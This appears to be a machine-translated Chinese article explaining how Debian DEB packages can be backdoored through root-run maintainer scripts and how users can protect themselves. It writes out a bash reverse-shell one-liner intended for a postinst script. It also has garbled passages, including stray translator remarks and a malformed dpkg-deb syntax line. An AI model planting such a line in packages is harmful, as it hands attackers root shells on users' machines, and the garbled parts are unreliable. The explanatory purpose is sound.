DEB 軟件包如何存在後門以及如何檢測它
要點
潛在的不法分子可能會利用 Debian 軟件包存儲庫,在安裝過程中利用提升的權限秘密地將有害軟件引入用戶的系統。
檢測受感染的 Debian 軟件包文件可能會帶來挑戰,因為它們可能會逃避防病毒程序和 VirusTotal 等基於雲的平台的檢測。
為了保護自己,建議不要從不熟悉的來源獲取 DEB 軟件包,而應選擇經過可信賴社區認可的授權分發平台或網站。此外,在 Linux 操作系統上實施安全措施可以幫助減輕網絡攻擊帶來的潛在威脅。
DEB 文件代表基於 Debian 的 Linux 操作系統的一種流行的軟件交付形式,作為在這些平台內分發應用程序的標準打包格式。
為了部署 Debian 軟件包 (DEB) 文件,需要在具有管理權限的情況下利用 dpkg 等軟件包管理工具。然而,網絡犯罪分子通過在這些軟件包中嵌入未經授權的訪問點來利用此漏洞,從而在通過 dpkg 或其他類似軟件安裝程序安裝時執行。這種策略可能會導致計算機系統的安全框架遭到破壞。
讓我們更深入地研究 DEB 軟件包中存在的後門漏洞的複雜性,並研究可以採取的措施來保護自己免受潛在威脅。
DEB 軟件包如何被後門?
讓我們首先深入研究 Debian 軟件包檔案 (DEB) 的複雜性,然後再闡述它們對後門漏洞的敏感性。為了說明這個概念,我們將利用直接從受人尊敬的 Microsoft 網站獲取的無處不在的 Microsoft Visual Studio Code DEB 包作為我們的參考點。全世界的 Linux 愛好者在各自的系統上安裝 Visual Studio Code 時都使用相同的軟件包。
要利用 dpkg-deb 實用程序提取 DEB 包的內容,可以使用“-R”標誌以及應存儲提取的文件的目錄路徑。此操作的語法類似於以下內容:cssdpkg-deb-R [DEPENDENCY_PATH] [TARGET_FILENAME]
dpkg-deb -R <package_name> <path>
以更精確的方式闡明此聲明的一種可能方法如下:“此操作旨在檢索 VS Code 軟件包中包含的內容。
訪問指定文件夾後,您會發現許多子目錄。然而,值得注意的是,我們只關心該文件夾中的“DEBIAN”目錄。該目錄包含一系列維護腳本,這些腳本在安裝時執行並擁有提升的權限,特別是 root 用戶的權限。眾所周知,惡意行為者會為了達到邪惡目的而操縱這些腳本,這也就不足為奇了。
請允許我為您改進語言。手頭的實例涉及修改安裝後腳本並將一個方便的反向 TCP shell 合併為一行 Bash 命令。根據其命名法,該腳本在系統上安裝軟件包後觸發。
上述腳本包含用於建立配置各個方面的指令,包括符號鏈接的建立和依賴關係的管理。網上有無數替代的反向 shell 解決方案,其中許多都具有類似的功能。例如,可以使用以下命令執行反向 shell 漏洞利用的說明性示例:
bash -i >& /dev/tcp/127.0.0.1/42069 0>&1
命令解釋:
Bash shell 的執行是通過此命令啟動的。
該標誌的存在提示 Bash 以交互方式運行,從而能夠立即輸入和輸出命令。
命令 ”